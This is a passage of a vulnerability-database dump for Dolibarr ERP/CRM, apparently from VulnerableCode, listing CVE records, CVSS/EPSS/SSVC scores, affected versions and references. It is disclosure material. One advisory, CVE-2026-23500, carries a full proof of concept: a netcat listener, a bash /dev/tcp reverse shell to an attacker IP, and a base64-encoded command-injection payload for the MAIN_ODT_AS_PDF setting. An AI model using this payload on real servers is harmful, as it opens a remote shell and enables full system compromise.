| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-9fes-esxc-s7gw |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 27 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 28 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 29 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 30 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 31 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 32 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 33 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 34 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 35 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 36 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 37 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 38 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 39 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 40 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 41 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 42 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 43 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 44 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3 |
|
|
| aliases |
CVE-2019-19209, GHSA-jh3j-xfv2-f9m9
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-jy5f-3h8w-qqff |
|
| 38 |
| url |
VCID-k9nc-tze6-k7bx |
| vulnerability_id |
VCID-k9nc-tze6-k7bx |
| summary |
Dolibarr has Insufficient Verification of Data Authenticity
A security flaw has been discovered in Dolibarr ERP CRM up to 23.0.2. This vulnerability affects the function dol_verifyHash in the library htdocs/core/lib/security.lib.php of the component Online Signature Module. The manipulation results in improper verification of a cryptographic signature. The attack may be performed remotely, but is highly complex and the exploitability is stated to be difficult. An exploit has been released to the public and may be used in attacks. The vendor was contacted early about this disclosure but did not respond in any way. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://gist.github.com/Shaon-Xis/d6ae069fc54f006457b68a91d5a8e158 |
|
| 2 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 1 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 2 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 3 |
|
| 4 |
| reference_url |
https://vuldb.com/submit/801794 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://vuldb.com/submit/801794 |
|
| 5 |
| reference_url |
https://vuldb.com/vuln/360859 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://vuldb.com/vuln/360859 |
|
| 6 |
| reference_url |
https://vuldb.com/vuln/360859/cti |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
2.6 |
| scoring_system |
cvssv2 |
| scoring_elements |
AV:N/AC:H/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR |
|
| 1 |
| value |
3.7 |
| scoring_system |
cvssv3 |
| scoring_elements |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 2 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R |
|
| 3 |
| value |
3.7 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N |
|
| 4 |
| value |
2.9 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 5 |
| value |
6.3 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P |
|
| 6 |
| value |
LOW |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 7 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-04T13:07:21Z/ |
|
|
| url |
https://vuldb.com/vuln/360859/cti |
|
| 7 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-7689, GHSA-jggh-5rmh-r6h5
|
| risk_score |
2.9 |
| exploitability |
0.5 |
| weighted_severity |
5.7 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-k9nc-tze6-k7bx |
|
| 39 |
| url |
VCID-m9p7-7wnz-7uck |
| vulnerability_id |
VCID-m9p7-7wnz-7uck |
| summary |
Cross-site Scripting
Dolibarr ERP/CRM has an Insufficient Filtering issue that can lead to `user/card.php` XSS. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19211 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.8438 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.844 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.84407 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.02101 |
| scoring_system |
epss |
| scoring_elements |
0.84404 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-19211 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-9fes-esxc-s7gw |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 27 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 28 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 29 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 30 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 31 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 32 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 33 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 34 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 35 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 36 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 37 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 38 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 39 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 40 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 41 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 42 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 43 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 44 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 26 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 27 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 28 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 29 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 30 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 31 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 32 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 33 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 34 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 35 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 36 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 37 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 38 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 39 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4 |
|
|
| aliases |
CVE-2019-19211, GHSA-gfhf-2xr5-2fvw
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-m9p7-7wnz-7uck |
|
| 40 |
| url |
VCID-mpmz-eh21-nkcm |
| vulnerability_id |
VCID-mpmz-eh21-nkcm |
| summary |
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
### Summary
An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.
### Details
The vulnerability is located in `htdocs/includes/odtphp/odf.php`.
When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.
Code snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):
```php
$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);
```
While the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.
### PoC
**Prerequisites:**
1. Login as an Administrator.
2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup.
**Steps to reproduce (Reverse Shell):**
1. Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):
```bash
nc -lvnp 4445
```
2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:
```bash
# Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
# Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
```
3. Navigate to **Home -> Setup -> Other Setup**.
4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:
```bash
jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
```
*(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*
5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.
6. Check the netcat listener. A connection will be established, granting a shell on the server.
### Impact
**Remote Code Execution (RCE).**
An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:
- Reading sensitive configuration files (database credentials).
- Modifying application code.
- Full system compromise depending on server configuration (e.g., docker escape, pivoting).
---
### Credits
Reported by Łukasz Rybak |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
9.1 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
|
| 1 |
| value |
9.4 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
|
| 2 |
| value |
CRITICAL |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-23500, GHSA-w5j3-8fcr-h87w
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-mpmz-eh21-nkcm |
|
| 41 |
| url |
VCID-nc61-xh5g-tugp |
| vulnerability_id |
VCID-nc61-xh5g-tugp |
| summary |
SQL Injection
Dolibarr ERP/CRM is vulnerable to an SQL injection in `user/index.php` (`search_supervisor` and `search_statut` parameters). |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9435 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56282 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56331 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56345 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00331 |
| scoring_system |
epss |
| scoring_elements |
0.56338 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9435 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3dpn-ry9j-rff6 |
|
| 7 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 8 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 9 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 10 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 11 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 12 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 13 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 14 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 15 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 16 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 17 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 18 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 19 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 20 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 21 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 22 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 23 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 24 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 25 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 26 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 27 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 28 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 29 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 30 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 31 |
| vulnerability |
VCID-fa52-4y55-37br |
|
| 32 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 33 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 34 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 35 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 36 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 37 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 38 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 39 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 40 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 41 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 42 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 43 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 44 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 45 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 46 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 47 |
| vulnerability |
VCID-s3d1-hcmh-fucu |
|
| 48 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 49 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 50 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 51 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 52 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 53 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 54 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 55 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 56 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 57 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 58 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 59 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 60 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 61 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 62 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.3 |
|
|
| aliases |
CVE-2017-9435, GHSA-v3m8-7h3p-6j5m
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nc61-xh5g-tugp |
|
| 42 |
| url |
VCID-nmjf-yxwc-m7hj |
| vulnerability_id |
VCID-nmjf-yxwc-m7hj |
| summary |
Cross-site Scripting
A Cross-site scripting (XSS) vulnerability in Dolibarr allows remote attackers to inject arbitrary web script or HTML via the `foruserlogin` parameter to `adherents/cartes/carte.php`. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10095 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.97757 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.97763 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.97762 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.475 |
| scoring_system |
epss |
| scoring_elements |
0.9776 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-10095 |
|
| 1 |
|
| 2 |
|
| 3 |
